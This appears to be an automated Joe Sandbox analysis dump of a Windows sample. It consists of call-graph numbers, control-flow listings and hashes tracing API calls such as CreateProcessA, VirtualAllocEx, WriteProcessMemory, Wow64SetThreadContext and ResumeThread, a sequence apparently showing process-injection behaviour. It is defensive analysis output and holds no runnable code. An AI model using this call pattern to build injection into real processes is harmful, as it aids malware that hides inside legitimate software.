39287->39276 39288->39276 39289->39276 39290->39276 39291->39276 39293 717bf97 39292->39293 39394 7178fc0 39293->39394 39398 7178fb8 39293->39398 39294 717bfb5 39295 717c44c 39294->39295 39402 7179080 39294->39402 39406 7179078 39294->39406 39302 7179080 WriteProcessMemory 39300->39302 39303 7179078 WriteProcessMemory 39300->39303 39301 717c4d9 39302->39301 39303->39301 39305 717c406 39304->39305 39306 717c44c 39304->39306 39305->39304 39307 7179080 WriteProcessMemory 39305->39307 39308 7179078 WriteProcessMemory 39305->39308 39307->39305 39308->39305 39310 717c52c 39309->39310 39312 717bf28 39309->39312 39410 7178a00 39310->39410 39414 71789f8 39310->39414 39311 717be3a 39311->39312 39319 7178fc0 VirtualAllocEx 39311->39319 39320 7178fb8 VirtualAllocEx 39311->39320 39312->39247 39313 717bfb5 39314 717c44c 39313->39314 39317 7179080 WriteProcessMemory 39313->39317 39318 7179078 WriteProcessMemory 39313->39318 39317->39313 39318->39313 39319->39313 39320->39313 39322 717be3a 39321->39322 39323 717bf28 39322->39323 39326 7178fc0 VirtualAllocEx 39322->39326 39327 7178fb8 VirtualAllocEx 39322->39327 39323->39247 39324 717bfb5 39325 717c44c 39324->39325 39328 7179080 WriteProcessMemory 39324->39328 39329 7179078 WriteProcessMemory 39324->39329 39326->39324 39327->39324 39328->39324 39329->39324 39333 7179080 WriteProcessMemory 39330->39333 39334 7179078 WriteProcessMemory 39330->39334 39331 717c2ef 39331->39330 39332 717bea6 39331->39332 39333->39331 39334->39331 39336 717be3a 39335->39336 39337 717bf28 39336->39337 39340 7178fc0 VirtualAllocEx 39336->39340 39341 7178fb8 VirtualAllocEx 39336->39341 39337->39247 39338 717bfb5 39339 717c44c 39338->39339 39342 7179080 WriteProcessMemory 39338->39342 39343 7179078 WriteProcessMemory 39338->39343 39340->39338 39341->39338 39342->39338 39343->39338 39345 717c5e9 39344->39345 39418 7178ab0 39345->39418 39422 7178aa8 39345->39422 39346 717c604 39350 717be3a 39349->39350 39351 717bfb5 39350->39351 39352 717bf28 39350->39352 39356 7178fc0 VirtualAllocEx 39350->39356 39357 7178fb8 VirtualAllocEx 39350->39357 39353 717c44c 39351->39353 39354 7179080 WriteProcessMemory 39351->39354 39355 7179078 WriteProcessMemory 39351->39355 39352->39247 39354->39351 39355->39351 39356->39351 39357->39351 39426 7179303 39358->39426 39430 7179308 39358->39430 39363 717c021 39362->39363 39434 7179170 39363->39434 39438 7179168 39363->39438 39364 717bfdc 39364->39247 39368 717c301 39367->39368 39369 717c44c 39368->39369 39370 7179080 WriteProcessMemory 39368->39370 39371 7179078 WriteProcessMemory 39368->39371 39370->39368 39371->39368 39374 7178ab0 Wow64SetThreadContext 39372->39374 39375 7178aa8 Wow64SetThreadContext 39372->39375 39373 717c0b6 39374->39373 39375->39373 39377 717beeb 39376->39377 39378 717bf28 39377->39378 39384 7178a00 ResumeThread 39377->39384 39385 71789f8 ResumeThread 39377->39385 39378->39247 39379 717be3a 39379->39378 39386 7178fc0 VirtualAllocEx 39379->39386 39387 7178fb8 VirtualAllocEx 39379->39387 39380 717bfb5 39381 717c44c 39380->39381 39382 7179080 WriteProcessMemory 39380->39382 39383 7179078 WriteProcessMemory 39380->39383 39382->39380 39383->39380 39384->39379 39385->39379 39386->39380 39387->39380 39390 717c039 39388->39390 39389 717c1df 39389->39247 39390->39389 39392 7179170 ReadProcessMemory 39390->39392 39393 7179168 ReadProcessMemory 39390->39393 39391 717bfdc 39391->39247 39392->39391 39393->39391 39395 7179000 VirtualAllocEx 39394->39395 39397 717903d 39395->39397 39397->39294 39399 7178fc0 VirtualAllocEx 39398->39399 39401 717903d 39399->39401 39401->39294 39403 71790c8 WriteProcessMemory 39402->39403 39405 717911f 39403->39405 39405->39294 39407 7179080 WriteProcessMemory 39406->39407 39409 717911f 39407->39409 39409->39294 39411 7178a40 ResumeThread 39410->39411 39413 7178a71 39411->39413 39413->39311 39415 7178a40 ResumeThread 39414->39415 39417 7178a71 39415->39417 39417->39311 39419 7178af5 Wow64SetThreadContext 39418->39419 39421 7178b3d 39419->39421 39421->39346 39423 7178af5 Wow64SetThreadContext 39422->39423 39425 7178b3d 39423->39425 39425->39346 39427 7179308 CreateProcessA 39426->39427 39429 7179553 39427->39429 39429->39429 39431 7179391 CreateProcessA 39430->39431 39433 7179553 39431->39433 39433->39433 39435 71791bb ReadProcessMemory 39434->39435 39437 71791ff 39435->39437 39437->39364 39439 71791bb ReadProcessMemory 39438->39439 39441 71791ff 39439->39441 39441->39364 39442 520b070 39443 520b0d8 CreateWindowExW 39442->39443 39445 520b194 39443->39445 39445->39445 39455 52068c0 39456 5206906 GetCurrentProcess 39455->39456 39458 5206951 39456->39458 39459 5206958 GetCurrentThread 39456->39459 39458->39459 39460 5206995 GetCurrentProcess 39459->39460 39461 520698e 39459->39461 39462 52069cb 39460->39462 39461->39460 39463 52069f3 GetCurrentThreadId 39462->39463 39464 5206a24 39463->39464 39446 717cd46 39447 717cd38 39446->39447 39450 717ce8b 39447->39450 39451 717ce1c 39450->39451 39452 717ce45 PostMessageW 39451->39452 39454 717ce96 39451->39454 39453 717cd3e 39452->39453 39465 5206b08 DuplicateHandle 39466 5206b9e 39465->39466 39467 1024668 39468 1024672 39467->39468 39470 1024778 39467->39470 39471 102479d 39470->39471 39475 1024877 39471->39475 39479 1024888 39471->39479 39472 10247a7 39472->39468 39476 1024888 39475->39476 39478 102498c 39476->39478 39483 10245a4 39476->39483 39478->39472 39480 10248af 39479->39480 39481 10245a4 CreateActCtxA 39480->39481 39482 102498c 39480->39482 39481->39482 39482->39472 39484 1025d18 CreateActCtxA 39483->39484 39486 1025ddb 39484->39486 39487 f8d1d4 39488 f8d1ec 39487->39488 39489 f8d246 39488->39489 39494 520a904 39488->39494 39502 520b228 39488->39502 39506 520bf88 39488->39506 39514 520b217 39488->39514 39497 520a90f 39494->39497 39495 520bff9 39526 520aa2c 39495->39526 39497->39495 39498 520bfe9 39497->39498 39518 520c120 39498->39518 39522 520c111 39498->39522 39499 520bff7 39503 520b24e 39502->39503 39504 520a904 CallWindowProcW 39503->39504 39505 520b26f 39504->39505 39505->39489 39509 520bfc5 39506->39509 39507 520bff9 39508 520aa2c CallWindowProcW 39507->39508 39511 520bff7 39508->39511 39509->39507 39510 520bfe9 39509->39510 39512 520c120 CallWindowProcW 39510->39512 39513 520c111 CallWindowProcW 39510->39513 39512->39511 39513->39511 39515 520b24e 39514->39515 39516 520a904 CallWindowProcW 39515->39516 39517 520b26f 39516->39517 39517->39489 39520 520c134 39518->39520 39519 520c1c0 39519->39499 39530 520c1d8 39520->39530 39524 520c120 39522->39524 39523 520c1c0 39523->39499 39525 520c1d8 CallWindowProcW 39524->39525 39525->39523 39527 520aa37 39526->39527 39528 520d6da CallWindowProcW 39527->39528 39529 520d689 39527->39529 39528->39529 39529->39499 39531 520c1e9 39530->39531 39533 520d610 39530->39533 39531->39519 39534 520aa2c CallWindowProcW 39533->39534 39535 520d62a 39534->39535 39535->39531 39536 717cb78 39538 717cd03 39536->39538 39540 717cb9e 39536->39540 39537 717cd3e 39541 717ce8b PostMessageW 39538->39541 39540->39538 39542 717b0a8 39540->39542 39541->39537 39544 717cdf8 PostMessageW 39542->39544 39545 717ce64 39544->39545 39545->39540

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 294 719eac0-719eae1 295 719eae8-719ebd4 294->295 296 719eae3 294->296 298 719ebda-719ed2b 295->298 299 719f3fc-719f424 295->299 296->295 344 719f3ca-719f3f9 298->344 345 719ed31-719ed8c 298->345 302 719fb05-719fb0e 299->302 303 719f432-719f43b 302->303 304 719fb14-719fb2b 302->304 306 719f43d 303->306 307 719f442-719f536 call 719e668 303->307 306->307 326 719f538-719f544 307->326 327 719f560 307->327 329 719f54e-719f554 326->329 330 719f546-719f54c 326->330 331 719f566-719f586 327->331 332 719f55e 329->332 330->332 336 719f588-719f5e0 331->336 337 719f5e5-719f65d 331->337 332->331 349 719fb02 336->349 355 719f65f-719f6b2 337->355 356 719f6b4-719f6f7 call 719e668 337->356 344->299 352 719ed8e 345->352 353 719ed91-719ed9c 345->353 349->302 352->353 357 719f2e0-719f2e6 353->357 386 719f702-719f708 355->386 356->386 359 719f2ec-719f369 357->359 360 719eda1-719edbf 357->360 400 719f3b6-719f3bc 359->400 362 719edc1-719edc5 360->362 363 719ee16-719ee2b 360->363 362->363 368 719edc7-719edd2 362->368 365 719ee2d 363->365 366 719ee32-719ee48 363->366 365->366 371 719ee4a 366->371 372 719ee4f-719ee66 366->372 373 719ee08-719ee0e 368->373 371->372 377 719ee68 372->377 378 719ee6d-719ee83 372->378 375 719ee10-719ee11 373->375 376 719edd4-719edd8 373->376 380 719ee94-719ef05 375->380 382 719edda 376->382 383 719edde-719edf6 376->383 377->378 384 719ee8a-719ee91 378->384 385 719ee85 378->385 390 719ef1b-719f093 380->390 391 719ef07 380->391 382->383 387 719edf8 383->387 388 719edfd-719ee05 383->388 384->380 385->384 389 719f75f-719f76b 386->389 387->388 388->373 394 719f70a-719f72c 389->394 395 719f76d-719f7f4 389->395 401 719f0a9-719f1e4 390->401 402 719f095 390->402 391->390 393 719ef09-719ef15 391->393 393->390 397 719f72e 394->397 398 719f733-719f75c 394->398 422 719f975-719f97e 395->422 397->398 398->389 405 719f36b-719f3b3 400->405 406 719f3be 400->406 415 719f248-719f25d 401->415 416 719f1e6-719f1ea 401->416 402->401 407 719f097-719f0a3 402->407 405->400 406->344 407->401 419 719f25f 415->419 420 719f264-719f285 415->420 416->415 417 719f1ec-719f1fb 416->417 421 719f23a-719f240 417->421 419->420 424 719f28c-719f2ab 420->424 425 719f287 420->425 428 719f1fd-719f201 421->428 429 719f242-719f243 421->429 430 719f7f9-719f80e 422->430 431 719f984-719f9df 422->431 426 719f2ad 424->426 427 719f2b2-719f2d2 424->427 425->424 426->427 434 719f2d9 427->434 435 719f2d4 427->435 432 719f20b-719f22c 428->432 433 719f203-719f207 428->433 438 719f2dd 429->438 436 719f810 430->436 437 719f817-719f963 430->437 453 719f9e1-719fa14 431->453 454 719fa16-719fa40 431->454 440 719f22e 432->440 441 719f233-719f237 432->441 433->432 434->438 435->434 436->437 442 719f8ea-719f92a 436->442 443 719f81d-719f85d 436->443 444 719f862-719f8a2 436->444 445 719f8a7-719f8e5 436->445 458 719f96f 437->458 438->357 440->441 441->421 442->458 443->458 444->458 445->458 462 719fa49-719fafb 453->462 454->462 458->422 462->349
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1731700356.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_7190000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4'^q$TJcq$Te^q$pbq$xbaq
                                                                                                  • API String ID: 0-2576840827
                                                                                                  • Opcode ID: 5e1bb2bc89461c0b47912bd3321fd2565ba62c5b7c76b031d3c2359c034cd97b
                                                                                                  • Instruction ID: 189b80d85c9e3aa93a737b6a21d8feafc3681f4d6a7b53f3752f21f0971623c8
                                                                                                  • Opcode Fuzzy Hash: 5e1bb2bc89461c0b47912bd3321fd2565ba62c5b7c76b031d3c2359c034cd97b
                                                                                                  • Instruction Fuzzy Hash: 3BB2D675E00228DFDB64CF69C984AD9BBB2FF89304F1581E5D509AB265DB319E82CF40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 467 52068b1-520694f GetCurrentProcess 472 5206951-5206957 467->472 473 5206958-520698c GetCurrentThread 467->473 472->473 474 5206995-52069c9 GetCurrentProcess 473->474 475 520698e-5206994 473->475 477 52069d2-52069ed call 5206a90 474->477 478 52069cb-52069d1 474->478 475->474 481 52069f3-5206a22 GetCurrentThreadId 477->481 478->477 482 5206a24-5206a2a 481->482 483 5206a2b-5206a8d 481->483 482->483
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0520693E
                                                                                                  • GetCurrentThread.KERNEL32 ref: 0520697B
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 052069B8
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 05206A11
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1729649732.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_5200000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Current$ProcessThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2063062207-0
                                                                                                  • Opcode ID: b131bd4cc2ab54b142b6c523309fc5bc099ca45fb3d87bf3b2fcf64aa7bc197d
                                                                                                  • Instruction ID: e42743a65ab5c79e90e0e86f43e8747ee69632f2bdb5a4892d9b653a4ac847bc
                                                                                                  • Opcode Fuzzy Hash: b131bd4cc2ab54b142b6c523309fc5bc099ca45fb3d87bf3b2fcf64aa7bc197d
                                                                                                  • Instruction Fuzzy Hash: 6D5185B09003098FDB14CFA9C588BDEBBF0EF88314F208459E059AB3A0D774A948CF65
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 490 52068c0-520694f GetCurrentProcess 494 5206951-5206957 490->494 495 5206958-520698c GetCurrentThread 490->495 494->495 496 5206995-52069c9 GetCurrentProcess 495->496 497 520698e-5206994 495->497 499 52069d2-52069ed call 5206a90 496->499 500 52069cb-52069d1 496->500 497->496 503 52069f3-5206a22 GetCurrentThreadId 499->503 500->499 504 5206a24-5206a2a 503->504 505 5206a2b-5206a8d 503->505 504->505
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0520693E
                                                                                                  • GetCurrentThread.KERNEL32 ref: 0520697B
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 052069B8
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 05206A11
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1729649732.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_5200000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Current$ProcessThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2063062207-0
                                                                                                  • Opcode ID: c7b48319b7543f79f541a541329c4af7791208aa3c7bf2ce3b39f2424a6e7362
                                                                                                  • Instruction ID: 69db325083f6b3e24418ff599265d0a7fbae3dd531d344dd4d314640e4e5a436
                                                                                                  • Opcode Fuzzy Hash: c7b48319b7543f79f541a541329c4af7791208aa3c7bf2ce3b39f2424a6e7362
                                                                                                  • Instruction Fuzzy Hash: A05175B09007098FDB14CFA9C548BDEBBF1EF88314F208459D059AB3A0D734A948CF65
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 837 7179303-717939d 840 71793d6-71793f6 837->840 841 717939f-71793a9 837->841 848 717942f-717945e 840->848 849 71793f8-7179402 840->849 841->840 842 71793ab-71793ad 841->842 843 71793d0-71793d3 842->843 844 71793af-71793b9 842->844 843->840 846 71793bd-71793cc 844->846 847 71793bb 844->847 846->846 850 71793ce 846->850 847->846 855 7179497-7179551 CreateProcessA 848->855 856 7179460-717946a 848->856 849->848 851 7179404-7179406 849->851 850->843 853 7179429-717942c 851->853 854 7179408-7179412 851->854 853->848 857 7179416-7179425 854->857 858 7179414 854->858 869 7179553-7179559 855->869 870 717955a-71795e0 855->870 856->855 860 717946c-717946e 856->860 857->857 859 7179427 857->859 858->857 859->853 861 7179491-7179494 860->861 862 7179470-717947a 860->862 861->855 864 717947e-717948d 862->864 865 717947c 862->865 864->864 867 717948f 864->867 865->864 867->861 869->870 880 71795e2-71795e6 870->880 881 71795f0-71795f4 870->881 880->881 882 71795e8 880->882 883 71795f6-71795fa 881->883 884 7179604-7179608 881->884 882->881 883->884 885 71795fc 883->885 886 717960a-717960e 884->886 887 7179618-717961c 884->887 885->884 886->887 888 7179610 886->888 889 717962e-7179635 887->889 890 717961e-7179624 887->890 888->887 891 7179637-7179646 889->891 892 717964c 889->892 890->889 891->892 894 717964d 892->894 894->894
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0717953E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1731498634.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_7170000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0
                                                                                                  • Opcode ID: 62291087d8ef74e387d9f761be8f13407ef3f70525cabe21f416ed261b5509e1
                                                                                                  • Instruction ID: 6a687d622ae7df94a0b7dce6e13e2b760afe122fd98f2ac90993d12159829c50
                                                                                                  • Opcode Fuzzy Hash: 62291087d8ef74e387d9f761be8f13407ef3f70525cabe21f416ed261b5509e1
                                                                                                  • Instruction Fuzzy Hash: 6D916FB1D00619DFDF11CFA8C9417EDBBB2BF44314F1481AAE849A7290DB74A985CF92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 895 7179308-717939d 897 71793d6-71793f6 895->897 898 717939f-71793a9 895->898 905 717942f-717945e 897->905 906 71793f8-7179402 897->906 898->897 899 71793ab-71793ad 898->899 900 71793d0-71793d3 899->900 901 71793af-71793b9 899->901 900->897 903 71793bd-71793cc 901->903 904 71793bb 901->904 903->903 907 71793ce 903->907 904->903 912 7179497-7179551 CreateProcessA 905->912 913 7179460-717946a 905->913 906->905 908 7179404-7179406 906->908 907->900 910 7179429-717942c 908->910 911 7179408-7179412 908->911 910->905 914 7179416-7179425 911->914 915 7179414 911->915 926 7179553-7179559 912->926 927 717955a-71795e0 912->927 913->912 917 717946c-717946e 913->917 914->914 916 7179427 914->916 915->914 916->910 918 7179491-7179494 917->918 919 7179470-717947a 917->919 918->912 921 717947e-717948d 919->921 922 717947c 919->922 921->921 924 717948f 921->924 922->921 924->918 926->927 937 71795e2-71795e6 927->937 938 71795f0-71795f4 927->938 937->938 939 71795e8 937->939 940 71795f6-71795fa 938->940 941 7179604-7179608 938->941 939->938 940->941 942 71795fc 940->942 943 717960a-717960e 941->943 944 7179618-717961c 941->944 942->941 943->944 945 7179610 943->945 946 717962e-7179635 944->946 947 717961e-7179624 944->947 945->944 948 7179637-7179646 946->948 949 717964c 946->949 947->946 948->949 951 717964d 949->951 951->951
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0717953E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1731498634.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_7170000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0
                                                                                                  • Opcode ID: e4758f762d0d345b46f6871d1cb579b2f8778ee4e190fd2b9e83652532542a4b
                                                                                                  • Instruction ID: 289ec68431352577a853ace12ab049bea37e7305346b71baf1f050bdb9686fe0
                                                                                                  • Opcode Fuzzy Hash: e4758f762d0d345b46f6871d1cb579b2f8778ee4e190fd2b9e83652532542a4b
                                                                                                  • Instruction Fuzzy Hash: 3D9170B1D0061ADFDF11CF68C9417DDBBB2BF44314F1481AAE849A7290DB74A985CF92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 952 5204628-5204637 953 5204663-5204667 952->953 954 5204639-5204646 call 5201b70 952->954 955 5204669-5204673 953->955 956 520467b-52046bc 953->956 959 5204648 954->959 960 520465c 954->960 955->956 963 52046c9-52046d7 956->963 964 52046be-52046c6 956->964 1009 520464e call 52048b0 959->1009 1010 520464e call 52048c0 959->1010 960->953 966 52046d9-52046de 963->966 967 52046fb-52046fd 963->967 964->963 965 5204654-5204656 965->960 968 5204798-5204858 965->968 970 52046e0-52046e7 call 5204290 966->970 971 52046e9 966->971 969 5204700-5204707 967->969 1002 5204860-520488b GetModuleHandleW 968->1002 1003 520485a-520485d 968->1003 974 5204714-520471b 969->974 975 5204709-5204711 969->975 973 52046eb-52046f9 970->973 971->973 973->969 977 5204728-5204731 call 52042a0 974->977 978 520471d-5204725 974->978 975->974 983 5204733-520473b 977->983 984 520473e-5204743 977->984 978->977 983->984 985 5204761-5204765 984->985 986 5204745-520474c 984->986 1007 5204768 call 5204bb0 985->1007 1008 5204768 call 5204bc0 985->1008 986->985 988 520474e-520475e call 52042b0 call 52042c0 986->988 988->985 991 520476b-520476e 993 5204770-520478e 991->993 994 5204791-5204797 991->994 993->994 1004 5204894-52048a8 1002->1004 1005 520488d-5204893 1002->1005 1003->1002 1005->1004 1007->991 1008->991 1009->965 1010->965
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0520487E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1729649732.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_5200000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: 80cd3dbc675fdf600353ad6f4461882d5c13bcc752ca97748b84c257173cf3f6
                                                                                                  • Instruction ID: a4c2e3424bdde96091931afe5e701408258b0a9dab32cb93b8d78b9972fcbe19
                                                                                                  • Opcode Fuzzy Hash: 80cd3dbc675fdf600353ad6f4461882d5c13bcc752ca97748b84c257173cf3f6
                                                                                                  • Instruction Fuzzy Hash: AE716670A11B058FDB24EF29D54476ABBF1FF88304F008A2DD18AC7A91E774E945CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1011 520b065-520b0d6 1012 520b0e1-520b0e8 1011->1012 1013 520b0d8-520b0de 1011->1013 1014 520b0f3-520b12b 1012->1014 1015 520b0ea-520b0f0 1012->1015 1013->1012 1016 520b133-520b192 CreateWindowExW 1014->1016 1015->1014 1017 520b194-520b19a 1016->1017 1018 520b19b-520b1d3 1016->1018 1017->1018 1022 520b1e0 1018->1022 1023 520b1d5-520b1d8 1018->1023 1024 520b1e1 1022->1024 1023->1022 1024->1024
                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0520B182
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1729649732.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_5200000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 716092398-0
                                                                                                  • Opcode ID: 5343c6ddfd891cdd8befe895eca9dd2b970adca5e1c0f74ba452d20cea089e29
                                                                                                  • Instruction ID: 6c4fc8d06819fc48db6acd5f4fdd18764136870e48b40c1d8eb92d3ba7f09ab7
                                                                                                  • Opcode Fuzzy Hash: 5343c6ddfd891cdd8befe895eca9dd2b970adca5e1c0f74ba452d20cea089e29
                                                                                                  • Instruction Fuzzy Hash: 1651C0B1D10349DFDB14CFA9C884ADEBBB5BF48310F24812AE819AB250D7759845CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0520B182
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1729649732.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_5200000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 716092398-0
                                                                                                  • Opcode ID: d061b0f100a31d8836e1a73f9b28e167e4854eb3f1aa8444aebeeecb213afc9d
                                                                                                  • Instruction ID: b4d8e8eafdf78ed65e4ad474184181579ed735196e388e295e1bcea85bf8627e
                                                                                                  • Opcode Fuzzy Hash: d061b0f100a31d8836e1a73f9b28e167e4854eb3f1aa8444aebeeecb213afc9d
                                                                                                  • Instruction Fuzzy Hash: E741C0B1D10349DFDB14CFA9C884ADEFBB5BF48310F24812AE819AB251D7B19885CF91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 01025DC9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1725475700.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_1020000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create
                                                                                                  • String ID:
                                                                                                  • API String ID: 2289755597-0
                                                                                                  • Opcode ID: fddea3183b080aca3cc1e89894b0d9caaad9133e8cf8ebae2c1c06ad9a5c72cb
                                                                                                  • Instruction ID: 04d92651cb93432bb762e88cf43d2a5831debee1414922d61cbe0841552645fa
                                                                                                  • Opcode Fuzzy Hash: fddea3183b080aca3cc1e89894b0d9caaad9133e8cf8ebae2c1c06ad9a5c72cb
                                                                                                  • Instruction Fuzzy Hash: BA4104B0C00729CEDB24DFA9C844BDEBBF5BF48304F24809AD448AB255DB756946CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 0520D701
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1729649732.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_5200000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallProcWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2714655100-0
                                                                                                  • Opcode ID: 1264b63cb5a2304a255c2e835668cd56cb148e73f87e477fa5c299a0dab252f9
                                                                                                  • Instruction ID: 970e44c72041d44e6054857b351b217823ea2a61bbfa402c8ab110c673720638
                                                                                                  • Opcode Fuzzy Hash: 1264b63cb5a2304a255c2e835668cd56cb148e73f87e477fa5c299a0dab252f9
                                                                                                  • Instruction Fuzzy Hash: 4C4118B9A11309CFCB14CF99C488AAABBF5FF88314F24C459D519AB361D774A845CFA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 01025DC9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1725475700.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_1020000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create
                                                                                                  • String ID:
                                                                                                  • API String ID: 2289755597-0
                                                                                                  • Opcode ID: b2f07c0d8ab445bf5530e0c3b16dee416f9b5b17a659866bb059f8f5a6e0f4b0
                                                                                                  • Instruction ID: 34a5d606aa6e1c1926a051a012c9422a738fb5b5c145fe4719464eeea83148c2
                                                                                                  • Opcode Fuzzy Hash: b2f07c0d8ab445bf5530e0c3b16dee416f9b5b17a659866bb059f8f5a6e0f4b0
                                                                                                  • Instruction Fuzzy Hash: E341F1B0C00729DBDB24DFA9C844BDEBBF5BF49304F2080AAE448AB255DB756945CF94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0717CE55
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.1731498634.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_7170000_VoAlKljQu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessagePost
                                                                                                  • String ID:
                                                                                                  • API String ID: 410705778-0
                                                                                                  • Opcode ID: 0aa3e64129c7eb2e6eff4e505b0cdaaec523da413246223fce4c3656b1c654a0
